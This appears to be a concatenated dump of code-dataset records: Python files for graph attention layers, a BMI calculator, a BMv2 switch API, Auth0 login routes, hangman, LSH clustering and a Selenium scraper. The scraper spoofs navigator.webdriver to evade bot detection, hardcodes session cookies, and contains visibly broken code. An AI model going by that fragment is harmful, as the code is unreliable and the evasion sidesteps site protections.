{test_accuracy:.2f}\")","repo_name":"shawlu95/ml2023-2-sofia","sub_path":"module9_knn_gridsearchcv.py","file_name":"module9_knn_gridsearchcv.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13252453655","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass GraphAttentionLayer(nn.Module):\n \"\"\"\n Simple GAT layer, similar to https://arxiv.org/abs/1710.10903\n \"\"\"\n def __init__(self, in_features, out_features, dropout, alpha, concat=True):\n super(GraphAttentionLayer, self).__init__()\n self.dropout = dropout\n self.in_features = in_features\n self.out_features = out_features\n self.alpha = alpha\n self.concat = concat\n\n self.W = nn.Parameter(torch.empty(size=(in_features, out_features)))\n nn.init.xavier_uniform_(self.W.data, gain=1.414)\n self.a = nn.Parameter(torch.empty(size=(2*out_features, 1)))\n nn.init.xavier_uniform_(self.a.data, gain=1.414)\n\n self.leakyrelu = nn.LeakyReLU(self.alpha)\n\n def forward(self, h, adj):\n Wh = torch.mm(h, self.W) # h.shape: (N, in_features), Wh.shape: (N, out_features)\n e = self._prepare_attentional_mechanism_input(Wh)\n\n zero_vec = -9e15*torch.ones_like(e)\n attention = torch.where(adj > 0, e, zero_vec)\n attention = F.softmax(attention, dim=1)\n attention = F.dropout(attention, self.dropout, training=self.training)\n h_prime = torch.matmul(attention, Wh)\n\n if self.concat:\n return F.elu(h_prime)\n else:\n return h_prime\n\n def _prepare_attentional_mechanism_input(self, Wh):\n # Wh.shape (N, out_feature)\n # self.a.shape (2 * out_feature, 1)\n # Wh1&2.shape (N, 1)\n # e.shape (N, N)\n Wh1 = torch.matmul(Wh, self.a[:self.out_features, :])\n Wh2 = torch.matmul(Wh, self.a[self.out_features:, :])\n # broadcast add\n e = Wh1 + Wh2.T\n return self.leakyrelu(e)\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' + str(self.in_features) + ' -> ' + str(self.out_features) + ')'\n\n\nclass 
SpecialSpmmFunction(torch.autograd.Function):\n \"\"\"Special function for only sparse region backpropataion layer.\"\"\"\n @staticmethod\n def forward(ctx, indices, values, shape, b):\n assert indices.requires_grad == False\n a = torch.sparse_coo_tensor(indices, values, shape)\n ctx.save_for_backward(a, b)\n ctx.N = shape[0]\n return torch.matmul(a, b)\n\n @staticmethod\n def backward(ctx, grad_output):\n a, b = ctx.saved_tensors\n grad_values = grad_b = None\n if ctx.needs_input_grad[1]:\n grad_a_dense = grad_output.matmul(b.t())\n edge_idx = a._indices()[0, :] * ctx.N + a._indices()[1, :]\n grad_values = grad_a_dense.view(-1)[edge_idx]\n if ctx.needs_input_grad[3]:\n grad_b = a.t().matmul(grad_output)\n return None, grad_values, None, grad_b\n\n\nclass SpecialSpmm(nn.Module):\n def forward(self, indices, values, shape, b):\n return SpecialSpmmFunction.apply(indices, values, shape, b)\n\n \nclass SpGraphAttentionLayer(nn.Module):\n \"\"\"\n Sparse version GAT layer, similar to https://arxiv.org/abs/1710.10903\n \"\"\"\n\n def __init__(self, in_features, out_features, dropout, alpha, concat=True):\n super(SpGraphAttentionLayer, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.alpha = alpha\n self.concat = concat\n\n self.W = nn.Parameter(torch.zeros(size=(in_features, out_features)))\n nn.init.xavier_normal_(self.W.data, gain=1.414)\n \n self.a = nn.Parameter(torch.zeros(size=(1, 2*out_features)))\n nn.init.xavier_normal_(self.a.data, gain=1.414)\n\n self.dropout = nn.Dropout(dropout)\n self.leakyrelu = nn.LeakyReLU(self.alpha)\n self.special_spmm = SpecialSpmm()\n\n def forward(self, input, adj):\n dv = 'cuda' if input.is_cuda else 'cpu'\n\n N = input.size()[0]\n edge = adj.nonzero().t()\n\n h = torch.mm(input, self.W)\n # h: N x out\n assert not torch.isnan(h).any()\n\n # Self-attention on the nodes - Shared attention mechanism\n edge_h = torch.cat((h[edge[0, :], :], h[edge[1, :], :]), dim=1).t()\n # edge: 2*D x E\n\n edge_e = torch.exp(-self.leakyrelu(self.a.mm(edge_h).squeeze()))\n assert not torch.isnan(edge_e).any()\n # edge_e: E\n\n e_rowsum = self.special_spmm(edge, edge_e, torch.Size([N, N]), torch.ones(size=(N,1), device=dv))\n # e_rowsum: N x 1\n\n edge_e = self.dropout(edge_e)\n # edge_e: E\n\n h_prime = self.special_spmm(edge, edge_e, torch.Size([N, N]), h)\n assert not torch.isnan(h_prime).any()\n # h_prime: N x out\n \n h_prime = h_prime.div(e_rowsum)\n # h_prime: N x out\n assert not torch.isnan(h_prime).any()\n\n if self.concat:\n # if this layer is not last layer,\n return F.elu(h_prime)\n else:\n # if this layer is last layer,\n return h_prime\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' + str(self.in_features) + ' -> ' + str(self.out_features) + ')'\n","repo_name":"Diego999/pyGAT","sub_path":"layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":5074,"program_lang":"python","lang":"en","doc_type":"code","stars":2639,"dataset":"github-code","pt":"75"} +{"seq_id":"31174726676","text":"# 82の出力を利用し,以下の出現分布,および定数を求めよ.\n# f(t,c): 単語tと文脈語cの共起回数\n# f(t,∗): 単語tの出現回数\n# f(∗,c): 文脈語cの出現回数\n# N: 単語と文脈語のペアの総出現回数\nimport collections\n\nipath = '../../data/input/'\nopath = '../../data/output/'\n\nfunc_t_c = []\nfunc_t_asta = []\nfunc_asta_c = []\ncount_f_t_c = collections.Counter()\ncount_f_t_a = collections.Counter()\ncount_f_a_c = collections.Counter()\n\nwith open(opath+'82.txt', encoding='utf-8') as f,\\\nopen(opath+'83_fn.txt', mode='w',encoding='utf-8') as fn:\n lines = f.readlines()\n for i,line in 
enumerate(lines,1):\n words = line.strip('\\n').split('\\t')\n\n func_t_c.append(line.strip('\\n'))\n func_t_asta.append(words[0])\n func_asta_c.append(words[1])\n if i % 1000000 == 0:\n count_f_t_c.update(func_t_c)\n count_f_t_a.update(func_t_asta)\n count_f_a_c.update(func_asta_c)\n func_t_c = []\n func_t_asta = []\n func_asta_c = []\n\n count_f_t_c.update(func_t_c)\n count_f_t_a.update(func_t_asta)\n count_f_a_c.update(func_asta_c)\n N = i\n print(N)\n fn.write(str(N))\n\nwith open(opath+'83_tc.txt',mode='a', encoding='utf-8') as ftc:\n for k,v in count_f_t_c.most_common():\n ftc.write('{}\\t{}\\n'.format(k,v))\n\nwith open(opath+'83_ta.txt', mode='a',encoding='utf-8') as fta:\n for k,v in count_f_t_a.most_common():\n fta.write('{}\\t{}\\n'.format(k,v))\n\nwith open(opath+'83_ac.txt', mode='a',encoding='utf-8') as fac:\n for k,v in count_f_a_c.most_common():\n fac.write('{}\\t{}\\n'.format(k,v))\n","repo_name":"ryu022304/NLP_100knocks","sub_path":"src/chap.09/83.py","file_name":"83.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"38156793911","text":"# 비만도 계산기 - 완성\n\nclass Bmi(object):\n def __init__(self, name, cm, kg):\n self.name = name\n self.cm = cm\n self.kg = kg\n self.biman = \"\"\n\n def execute(self):\n self.biman = self.get_biman()\n self.get_biman()\n self.print_biman()\n\n def get_bmi(self):\n m = self.cm / 100\n kg = self.kg\n return kg / m ** 2 # ** 제곱\n\n def get_biman(self):\n cal = self.get_bmi()\n if cal >= 35:\n biman = \"고도 비만\"\n elif cal >= 30:\n biman = \"중(重)도 비만 (2단계 비만)\"\n elif cal >= 25:\n biman = \"경도 비만 (1단계 비만)\"\n elif cal >= 23:\n biman = \"과체중\"\n elif cal >= 18.5:\n biman = \"정상\"\n else:\n biman = \"저체중\"\n self.biman = biman\n\n def print_biman(self):\n name = self.name\n biman = self.biman\n cm = self.cm\n kg = self.kg\n title = \" ### 비만도 계산기 ### \"\n aster = \"*\"*40\n schema = \"이름 키(cm) 몸무게(kg) 비만도\"\n result = f'{name} {cm} {kg} {biman}'\n print(f'{title}\\n{aster}\\n{schema}\\n{aster}\\n{result}\\n{aster}')\n\n @staticmethod\n def main():\n name = input(\"이름 : \")\n cm = int(input(\"키(cm) : \"))\n kg = int(input(\"몸무게(kg) : \"))\n bmi = Bmi(name, cm, kg)\n bmi.execute()\n\nBmi.main()","repo_name":"phayeon/Python-program","sub_path":"encapsulation/bmi.py","file_name":"bmi.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2968847424","text":"import sys\nimport time\nimport logging\nimport os\n\nif os.name == 'nt':\n from neutron.agent.windows import utils as exc_utils\nelse:\n from neutron.agent.linux import utils as exc_utils\n\nfrom runtime_CLI import ResType\n\nimport networking_p4.agent.agent_drivers.bmv2.adaptor.bmv2.runtime_api\nfrom bm_runtime.standard.Standard import *\nfrom networking_p4.agent.agent_drivers.bmv2.adaptor.bmv2.runtime_api import parse_match_key\n\nLOG = logging.getLogger(__name__)\n\nACTION_TYPE_DEFAULT = 'default'\nACTION_TYPE_RUNTIME = 'runtime'\n\nBMv2_PORT = 9090\n\n\nclass Bmv2Api(object):\n\n def _get_bmv2_api(self):\n return networking_p4.agent.agent_drivers.bmv2.adaptor.bmv2.runtime_api.get_api(BMv2_PORT)\n\n def _get_bmv2_client(self):\n return self._get_bmv2_api().client\n\n def add_port(self, iface_name):\n port_num = self._get_port_num_from_pool()\n self._get_bmv2_client().bm_dev_mgr_add_port(iface_name, port_num, \"\")\n\n def _get_port_num_from_pool(self):\n ports_int = []\n for port_info in 
self._get_bmv2_client().bm_dev_mgr_show_ports():\n ports_int.append(int(port_info.port_num))\n ports_int.sort()\n size = len(ports_int)\n last_port_num = size + 1\n return last_port_num\n\n def get_number_of_ports(self):\n return len(self._get_bmv2_client().bm_dev_mgr_show_ports())\n\n def _clean_ports(self):\n ports = self._get_bmv2_client().bm_dev_mgr_show_ports()\n for port_info in ports:\n self._get_bmv2_client().bm_dev_mgr_remove_port(port_info.port_num)\n\n def remove_port(self, iface_name):\n port_num = self._get_port_num_by_name(iface_name)\n self._get_bmv2_client().bm_dev_mgr_remove_port(port_num)\n\n def _get_port_num_by_name(self, iface_name):\n port_num = None\n ports = self._get_bmv2_client().bm_dev_mgr_show_ports()\n for port_info in ports:\n if port_info.iface_name == iface_name:\n port_num = port_info.port_num\n break\n return port_num\n\n def run(self, intf):\n cmd = ['sudo', 'simple_switch', '-i', intf, '--thrift-port',\n '10811', '--no-p4',\n '--', '--enable-swap']\n exc_utils.execute(cmd, run_as_root=True, log_fail_as_error=True)\n\n def create_instance(self, intf):\n intf_def = \"1@\" + intf\n\n self.run(intf_def)\n\n time.sleep(3)\n\n LOG.info(\"BMv2 instance created. \" + str(self.get_config()))\n\n def delete_instance(self):\n pass\n\n def get_config(self):\n return self._get_bmv2_client().bm_get_config()\n\n def upload_config(self, json_conf):\n try:\n self._get_bmv2_client().bm_load_new_config(json_conf)\n except InvalidSwapOperation as e:\n if e.code == SwapOperationErrorCode.ONGOING_SWAP:\n LOG.warning(\"P4Agent tries to load new config during swap ongoing. \"\n \"Swapping configs and retrying..\")\n self._get_bmv2_client().bm_swap_configs()\n self.upload_config(json_conf)\n try:\n self._get_bmv2_client().bm_swap_configs()\n except InvalidSwapOperation as e:\n if e.code == SwapOperationErrorCode.NO_ONGOING_SWAP:\n pass\n else:\n raise e\n\n def table_set_default_entry(self, table_name, action_name, action_entry):\n self._get_bmv2_client().bm_mt_set_default_action(0, table_name, action_name, action_entry)\n\n def table_set_runtime_entry(self, table_name, match_keys, action_name, action_entry, priority):\n # get object representing P4 Table\n table = self._get_bmv2_api().get_res(\"table\", table_name, ResType.table)\n # get object representing P4 Action\n action = table.get_action(action_name)\n\n # parse arrays to Thrift-friendly objects\n match_obj = parse_match_key(table, match_keys)\n action_obj = self._get_bmv2_api().parse_runtime_data(action, action_entry)\n\n LOG.info(\"Adding table entry.. 
%s %s %s\" % (table.name, str(match_obj), str(action_obj)))\n\n entry = None\n\n # check if entry with match key exists\n try:\n entry = self._get_bmv2_client().bm_mt_get_entry_from_key(\n 0, table.name, match_obj, BmAddEntryOptions(priority=priority))\n except InvalidTableOperation as e:\n if e.code == TableOperationErrorCode.BAD_MATCH_KEY:\n # it means there is no entry for match key\n pass\n\n if entry:\n # modify existing entry\n self._get_bmv2_client().bm_mt_modify_entry(\n 0, table.name, entry.entry_handle, action.name, action_obj\n )\n LOG.debug(\"Entry {} has been modified with action {} {}\".format(str(match_keys), action_name,\n str(action_entry)))\n else:\n # adding new entry\n self._get_bmv2_client().bm_mt_add_entry(\n 0, table_name, match_obj, action.name, action_obj,\n BmAddEntryOptions(priority=priority)\n )\n LOG.debug(\"Entry {} has been added with action {} {}\".format(str(match_keys), action_name,\n str(action_entry)))\n\n def add_table_entry(self, **kwargs):\n action_type = kwargs['action_type']\n table_name = kwargs['table_id']\n action_name = kwargs['action_name']\n action_entry = kwargs['action_params']\n if action_type == ACTION_TYPE_DEFAULT:\n self.table_set_default_entry(table_name, action_name, action_entry)\n elif action_type == ACTION_TYPE_RUNTIME:\n match_keys = kwargs['match_keys']\n priority = kwargs['priority'] if kwargs['priority'] else 0\n self.table_set_runtime_entry(table_name, match_keys, action_name, action_entry, priority)\n\n def delete_table_entry(self, **kwargs):\n action_type = kwargs['action_type']\n table_name = kwargs['table_id']\n action_name = kwargs['action_name']\n action_entry = kwargs['action_params']\n match_keys = kwargs['match_keys']\n priority = kwargs['priority'] if kwargs['priority'] else 0\n\n table = self._get_bmv2_api().get_res(\"table\", table_name, ResType.table)\n match_obj = parse_match_key(table, match_keys)\n\n entry = self._get_bmv2_client().bm_mt_get_entry_from_key(\n 0, table.name, match_obj, BmAddEntryOptions(priority=priority))\n\n self._get_bmv2_client().bm_mt_delete_entry(0, table.name, entry.entry_handle)\n\n def get_entries_from_table(self, table_name):\n table = self._get_bmv2_api().get_res(\"table\", table_name, ResType.table)\n return self._get_bmv2_client().bm_mt_get_entries(0, table.name)\n\n def get_all_table_entries(self):\n pass\n","repo_name":"osinstom/networking-dppx","sub_path":"networking_p4/agent/agent_drivers/bmv2/adaptor/bmv2/bmv2_api.py","file_name":"bmv2_api.py","file_ext":"py","file_size_in_byte":6901,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"26345081840","text":"\"\"\"THird migration\n\nRevision ID: 4de6eb28ace7\nRevises: 4b4e0f0c687b\nCreate Date: 2019-04-21 14:43:29.316188\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4de6eb28ace7'\ndown_revision = '4b4e0f0c687b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('pithes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('pitch', sa.String(length=500), nullable=True),\n sa.Column('role_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['role_id'], ['roles.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.drop_constraint('users_role_id_fkey', 'users', type_='foreignkey')\n op.drop_column('users', 'role_id')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('users', sa.Column('role_id', sa.INTEGER(), autoincrement=False, nullable=True))\n op.create_foreign_key('users_role_id_fkey', 'users', 'roles', ['role_id'], ['id'])\n op.drop_table('pithes')\n # ### end Alembic commands ###\n","repo_name":"kipkemoimayor/Pitch","sub_path":"migrations/versions/4de6eb28ace7_third_migration.py","file_name":"4de6eb28ace7_third_migration.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7741773523","text":"# -*- coding: utf-8 -*-\n\"\"\"\n# @Time : 2021/8/13 9:19\n# @Author : ChenLvLei\n# @Email : 2516455367@qq.com\n# @FileName : hubeisheng\n# @Description :http://sthjt.hubei.gov.cn/site/sthjt/search.html?searchWord=%E7%A2%B3%E6%8E%92%E6%94%BE&siteId=41&pageSize=10\n# code is far away from bugs with the god animal protecting\n I love animals. They taste delicious.\n ┏┓ ┏┓\n ┏┛┻━━━┛┻┓\n ┃ ☃ ┃\n ┃ ┳┛ ┗┳ ┃\n ┃ ┻ ┃\n ┗━┓ ┏━┛\n ┃ ┗━━━┓\n ┃ 神兽保佑 ┣┓\n ┃ 永无BUG! ┏┛\n ┗┓┓┏━┳┓┏┛\n ┃┫┫ ┃┫┫\n ┗┻┛ ┗┻┛\n\"\"\"\nimport re\nimport sys\nimport time\nfrom selenium.webdriver import ChromeOptions\n\n\n\n\n\nimport requests\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nheaders = {\n 'Connection': 'keep-alive',\n 'Cache-Control': 'max-age=0',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n}\ncookies = {\n 'FSSBBIl1UgzbN7NS': '52LhjfsRCbsKkS60MmirBXJ3VwhH57l2l2_lKZe997bY3lCFI7JD8esapOhk9Bbkgwd6wS0.Ra6Jc6NqFiSJ8Ba',\n 'SECKEY_CID2': '04b694981378f15713c68048699130ca543bfe17',\n 'BMAP_SECKEY2': 'c6d9c7e05d7e627c56ed46fab5d7c5c792064779599d5e12b955a6f18a1204375d1588206c94d22e4bdd1ade0ad06e78c21917e24c6223b96bc51b75ca38651a6fc59510ca068f1214d6bf0c8b54732b4fb988b974e1f28e45a8804d088d994188c248f323240a0e5ed7d9fc646294ab24144bc3df98c0390b316da11851a5051b6dbf5b892d2fc10114795dc6da4dc719fe9e3e2f451517db774263c9083301f4c2689ab9ec02810ae19a2a76b3e45b0c6dc9b4ed4575f8871066fc82ca20f77a138daa61c2dacfbc2e26d51dac29bb67bc1f07fa6ac9b5b8adf6daa8e65f427e93db69cfb38b2d4053b8419bd91c30',\n 'FSSBBIl1UgzbN7NT': '533z0XDDhwhGqqqmechdTBaam_M_Y65VDq.Pkm77UpzOVxZuvnGmK3j1FyZhrVn21dlKqzBxFh5prvc172OQHKAfHsjd5lAkTGKyBdwaL9d1b1F.lkuKZpbSt6E39y6L8cdeaRv8PH8Re75qohThX7DvzQK0Fj6UifccQ2t7tbgjU0DXTqH6KJQbg.IDx5iB5kL3bH53m0M_oBGhdUgfTamWg.khKvlrIPKBoK6.8TMdoHWA4mKV14nk7s9fe7_1QARzIz2xME_S3ts4OV6mWQeIh5PCVXQGJDFLBmsjIG7uj8PB3wIvEjcJT_nTEINMfL',\n}\nchrome_options = ChromeOptions()\n# chrome_options.add_argument(\"--incognito\") # 配置隐私模式\n# chrome_options.add_experimental_option('excludeSwitches', ['enable-automation'])\nchrome_options.add_argument('--no-sandbox') # 解决DevToolsActivePort文件不存在的报错\nchrome_options.add_argument('window-size=1920x3000') # 
指定浏览器分辨率\nchrome_options.add_argument('--disable-gpu') # 谷歌文档提到需要加上这个属性来规避bug\nchrome_options.add_argument('--hide-scrollbars') # 隐藏滚动条, 应对一些特殊页面\nchrome_options.add_argument('blink-settings=imagesEnabled=false') # 不加载图片, 提升速度\nchrome_options.add_argument('--headless')\ndriver = webdriver.Chrome(\"/usr/bin/chromedriver\", chrome_options=chrome_options)\ndriver.execute_cdp_cmd(\"Page.addScriptToEvaluateOnNewDocument\", {\n \"source\": \"\"\"\n Object.defineProperty(navigator,'webdriver',{\n get: () => undefined\n })\n \"\"\"\n})\ntime.sleep(20)\ndriver.get('http://www.sgcc.com.cn/html/sgcc_main/index.shtml')\ntime.sleep(5)\ncontent = driver.page_source\nprint(content)\ncookie = driver.get_cookies()\ndict(cookies)\ncookies['FSSBBIl1UgzbN7NS'] = cookie[2].get('value')\ncookies['SECKEY_CID2'] = cookie[3].get('value')\ncookies['BMAP_SECKEY2'] = cookie[0].get('value')\ncookies['FSSBBIl1UgzbN7NT'] = cookie[1].get('value')\n\nurl = re.compile('(.*?)').findall(str(articleContent))\n if title == []:\n continue\n print(title[0])\n except Exception as err:\n print()\n\n\n\n","repo_name":"houwudi14010/github_huanghyw_jd_seckill-master","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"75"} +{"seq_id":"73340829682","text":"import random\r\nfrom replit import clear\r\n\r\nstages = ['''\r\n +---+\r\n | |\r\n O |\r\n /|\\ |\r\n / \\ |\r\n |\r\n=========\r\n''', '''\r\n +---+\r\n | |\r\n O |\r\n /|\\ |\r\n / |\r\n |\r\n=========\r\n''', '''\r\n +---+\r\n | |\r\n O |\r\n /|\\ |\r\n |\r\n |\r\n=========\r\n''', '''\r\n +---+\r\n | |\r\n O |\r\n /| |\r\n |\r\n |\r\n=========''', '''\r\n +---+\r\n | |\r\n O |\r\n | |\r\n |\r\n |\r\n=========\r\n''', '''\r\n +---+\r\n | |\r\n O |\r\n |\r\n |\r\n |\r\n=========\r\n''', '''\r\n +---+\r\n | |\r\n |\r\n |\r\n |\r\n |\r\n=========\r\n''']\r\n\r\nword_list = [\"arvore\",\"amor\",\"gato\",\"cacho\",\"rio\",\"perola\",\"flor\",\"lua\",\"ceu\",\"melao\",\"mesa\",\"chave\",\"banho\",\"livro\",\"cesta\",\"marca\",\"peixe\",\"sorte\",\"praia\",\"bolsa\",\"antes\",\"rocha\",\"camel\",\"amigo\",\"pipa\",\"canto\",\"vaso\",\"papai\",\"queijo\",\"rodas\",\"trevo\",\"sobre\",\"lente\",\"velho\",\"corte\",\"prato\",\"cinza\",\"terra\",\"mundo\",\"lirio\",\"leao\",\"cavalo\",\"roda\",\"barco\",\"pele\",\"sapato\",\"chuva\",\"lago\",\"alien\",\"caneta\",\"pastel\",\"danca\",\"teatro\",\"pesca\",\"piscar\",\"brinco\",\"fraco\",\"anjos\",\"sucos\",\"biscoito\",\"canto\",\"fazer\",\"falar\",\"comer\",\"chove\",\"passeio\",\"forno\",\"pular\",\"bebes\",\"azeite\",\"fruta\",\"fofoca\",\"areia\",\"feira\",\"salmao\",\"bruxa\",\"brasa\",\"fogos\",\"cegar\",\"habito\",\"focos\",\"honra\",\"joias\",\"mural\",\"palha\",\"irmao\",\"limpo\",\"pneus\",\"queda\",\"toalha\",\"vagas\",\"sorte\",\"secar\",\"pegar\",\"velho\",\"queda\",\"visita\",\"rapou\",\"acatar\",\"bigorna\",\"cinico\"]\r\nchosen_word = random.choice(word_list)\r\n\r\nvidas = 6\r\n\r\n#Testing code\r\n#print(f'Pssst, the solution is {chosen_word}.')\r\n\r\ndisplay = []\r\nn = len(chosen_word)\r\nfor _ in range(len(chosen_word)):\r\n display.append(\"_\")\r\n\r\nprint(f\"A palavra que você precisa descobrir tem {n} letras\\n\")\r\nprint(f\"{display}\")\r\nprint(stages[vidas])\r\n\r\nfim_de_jogo = False\r\ntentativas = []\r\n\r\nwhile not fim_de_jogo:\r\n guess = input(\"Escolha a letra: \").lower()\r\n clear()\r\n \r\n if len(guess) == 1:\r\n if guess not in tentativas:\r\n for position in 
range(len(chosen_word)):\r\n letter = chosen_word[position]\r\n \r\n if letter == guess:\r\n display[position] = letter\r\n \r\n if guess in chosen_word:\r\n print(f\"Você acertou, {guess} é uma das letras.\\n\") \r\n \r\n if guess not in chosen_word:\r\n vidas -= 1\r\n print(f\"Você errou, {guess} não é uma das letras.\\n\")\r\n\r\n tentativas.append(guess)\r\n print(f\"tentativas:{sorted(tentativas)}\")\r\n print(stages[vidas])\r\n print(f\"{display}\\n\")\r\n \r\n if vidas == 0: \r\n print(f\"GAME OVER... Você perdeu!\\nA palavra era {chosen_word}\")\r\n break \r\n \r\n if \"_\" not in display:\r\n fim_de_jogo = True\r\n print(\"Você venceu!\") \r\n \r\n else:\r\n print(f\"Você já escolheu a letra {guess} anteriormente. Tente novamente.\")\r\n print(f\"tentativas:{sorted(tentativas)}\")\r\n print(stages[vidas])\r\n print(f\"{display}\\n\")\r\n \r\n else:\r\n print(\"Escreva apenas uma letra...\")\r\n","repo_name":"marcelozc/Python","sub_path":"aula7_jogo_da_forca.py","file_name":"aula7_jogo_da_forca.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40031882468","text":"from typing import List\n\n\nclass Solution:\n def removeElement(self, nums: List[int], val: int) -> int:\n if len(nums) == 0:\n return 0\n rear = len(nums)\n for i in range(len(nums)):\n while rear >= 1 and nums[rear - 1] == val:\n rear -= 1\n if nums[i] == val and i < rear:\n nums[i], nums[rear - 1] = nums[rear - 1], nums[i]\n rear -= 1\n i -= 1\n return rear\n\n\ndef main():\n nums = [0,4,4,0,4,4,4,0,2]\n val = 4\n res = Solution().removeElement(nums, val)\n print(res)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Jintaimeng/Leetcode","sub_path":"一、数组/27、移除元素.py","file_name":"27、移除元素.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34864266038","text":"from os import environ as env\nfrom urllib.parse import quote_plus, urlencode\n\nfrom authlib.integrations.starlette_client import OAuth\nfrom fastapi import APIRouter, Request, Depends\nfrom fastapi.responses import RedirectResponse\nfrom fastapi.security import APIKeyHeader\nfrom fastapi.exceptions import HTTPException\nfrom starlette.config import Config\nimport app.crud as crud\nimport app.common as common\nimport app.exceptions as exceptions\n\nconfig = Config(\".env\")\noauth = OAuth(config)\nauth0 = oauth.register(\n \"auth0\",\n client_id=env.get(\"AUTH0_CLIENT_ID\"),\n client_secret=env.get(\"AUTH0_CLIENT_SECRET\"),\n client_kwargs={\n \"scope\": \"openid profile email\",\n },\n server_metadata_url=f'https://{env.get(\"AUTH0_DOMAIN\")}/.well-known/openid-configuration',\n)\nassert auth0\n\napi_key_header = APIKeyHeader(name=\"Authorization\")\n\n\ndef dep_api_key(api_key_header: str = Depends(api_key_header)):\n if api_key_header != env.get(\"API_KEY\"):\n raise HTTPException(status_code=403, detail=\"Unauthorized\")\n return api_key_header\n\n\nrouter = APIRouter(prefix=\"\", tags=[\"authentication\"])\n\n\n@router.get(\"/login\")\nasync def login(request: Request):\n print(request)\n redirect_uri = str(request.url_for(\"callback\"))\n print(f\"login redirect_uri: {redirect_uri}\")\n return await auth0.authorize_redirect(request, redirect_uri)\n\n\n@router.get(\"/callback\")\nasync def callback(request: Request, db=Depends(crud.dep_db)):\n jwt = await auth0.authorize_access_token(request)\n request.session[\"user\"] = jwt\n if 
crud.get_user(db, common.get_sub_from_jwt(jwt)) is None:\n crud.create_user(\n db, user_id=common.get_sub_from_jwt(jwt), email=jwt[\"userinfo\"][\"email\"]\n )\n return RedirectResponse(request.url_for(\"index\"))\n\n\n@router.get(\"/logout\")\nasync def logout(request: Request):\n request.session.clear()\n index_url = str(request.url_for(\"index\"))\n logout_url = (\n \"https://\"\n + env.get(\"AUTH0_DOMAIN\", \"\")\n + \"/v2/logout?\"\n + urlencode(\n {\n \"returnTo\": index_url,\n \"client_id\": env.get(\"AUTH0_CLIENT_ID\"),\n },\n quote_via=quote_plus,\n )\n )\n return RedirectResponse(url=logout_url)\n","repo_name":"thornewolf/fastapi-tailwind-database-openai","sub_path":"app/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2095245562","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom datasketch import MinHash, MinHashLSH\n\n\nclass LSHClusteringLib(object):\n \"\"\"\n Suppose you have a very large collection of sets. Giving a query, which is\n also a set, you want to find sets in your collection that have Jaccard\n similarities above certain threshold, and you want to do it with many other\n queries. To do this efficiently, you can create a MinHash for every set,\n and when a query comes, you compute the Jaccard similarities between the\n query MinHash and all the MinHash of your collection, and return the sets\n that satisfy your threshold.\n\n *** Read more via : https://ekzhu.github.io/datasketch/lsh.html\n\n \"\"\"\n\n def __init__(self, threshold=0.9, num_perm=128):\n \"\"\"\n Init\n Args:\n threshold (float): The Jaccard similarity threshold between 0.0 and\n 1.0. The initialized MinHash LSH will be optimized for the threshold\n by minizing the false positive and false negative.\n num_perm (int): The number of permutation functions used\n by the MinHash to be indexed\n \"\"\"\n self.threshold = threshold\n self.num_perm = num_perm\n self.lsh_server = MinHashLSH(threshold=threshold, num_perm=num_perm)\n\n def get_lsh_server(self):\n return self.lsh_server\n\n def compute_min_hash_lsh(self, terms):\n \"\"\"\n Compute min hash LSH of a set of tokens\n\n Args:\n terms (set): set of unique terms\n\n Returns:\n (MinHash): min hash LSH value\n\n \"\"\"\n m = MinHash(num_perm=self.num_perm)\n for e in terms:\n m.update(e.encode('utf8'))\n return m\n\n def compute_min_hash_lsh_over_data(self, record_ids, data):\n \"\"\"\n Compute min hash of each document from given record Ids and data\n Args:\n record_ids (list[int]): list of given record Id\n data (list[list[str]]): list of content belonged to record Ids above\n\n Returns:\n lsh_vals (list[MinHash]): list of min hash value\n\n \"\"\"\n # make sure docId is unique over the corpus\n assert len(set(record_ids)) == len(record_ids)\n\n # for each record compute the hash\n lsh_vals = [\n self.compute_min_hash_lsh(terms=set(terms))\n for terms in data\n ]\n # TODO: convert to parallel\n for record_id, hash_val in 